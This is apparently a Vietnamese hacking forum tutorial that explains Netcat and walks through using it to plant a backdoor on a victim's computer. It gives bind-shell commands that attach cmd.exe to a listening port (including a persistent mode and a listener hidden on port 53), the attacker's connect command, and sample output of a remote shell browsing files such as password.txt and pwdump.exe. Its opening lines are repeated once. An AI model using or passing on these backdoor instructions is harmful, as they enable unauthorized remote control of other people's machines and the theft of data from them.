Netcat là gì? Sử dụng nó để tạo BackDoor như thế nào?
Netcat là gì ?
- Netcat là một công cụ đã có từ rất lâu với nhiều tiện ích có thể viết và đọc dữ liệu qua TCP và UDP
- Netcat có thể được sử dụng như máy quét Port,Backdoor...
- Netcat là một rất tốt cho công việc, thậm chí là bao gồm cả việc thể hiện !
Sử dụng
 |
| Netcat |
- Netcat là một công cụ đã có từ rất lâu với nhiều tiện ích có thể viết và đọc dữ liệu qua TCP và UDP
- Netcat có thể được sử dụng như máy quét Port,Backdoor...
- Netcat là một rất tốt cho công việc, thậm chí là bao gồm cả việc thể hiện !
Sử dụng
- Có rất nhiều cách để sử dụng nó nhưng ở đây tớ sẽ hướng dẫn anh em tạo và sử dụng Netcat tạo BackDoor nhé !
- Trên máy tính nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l(listen) và –p port để xát định số hiệu cổng lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có một kết nối đến, thường là shell lệnh cmd.exe hoặc /bin/sh (Unix).
Ví dụ :
E:>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error
trên máy tính dùng để tấn công , chỉ cần dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080
C:>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.
E:>cd test
cd test
E:test>dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:test
[.] [..] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:test>exit
exit
sent 20, rcvd 450: NOTSOCK
Như bạn thấy , chúng ta có thể làm bất cứ điều gì đối với máy tính nạn nhận qua lệnh shell, tuy nhien sau kết nối máy tính nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mõi kết nối, bạn dùng –L thay cho –l .một điều lưu ý –L chỉ có thể áp dụng cho bản Netcat của Window, không áp dụng cho Linux.
E:>nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...
Riêng đối với NetCat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe, chỉ cần định nghĩa địa chỉ nguồn là
–s.ví dụ :
Netstat –a ...
TCP nan_nhan:domain nan_nhan:0 listENING <- cổng 53 dang lắng nghe ...
E:>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 > lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163
Trên Window NT , để đặt NetCat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần loign vào bằng một user bình thường rồi khởi động NetCat là xong.
Chú ý : bạn không thể chạy netcat với … -u –e cmd.exe… hoặc … -u –e /bin/sh…vì netcat sẽ không làm việc đúng, nếu bạn muốn có 1 UDP shell tren Unix , hãy dùng udpshell thay cho netcat. HVA Author about that !
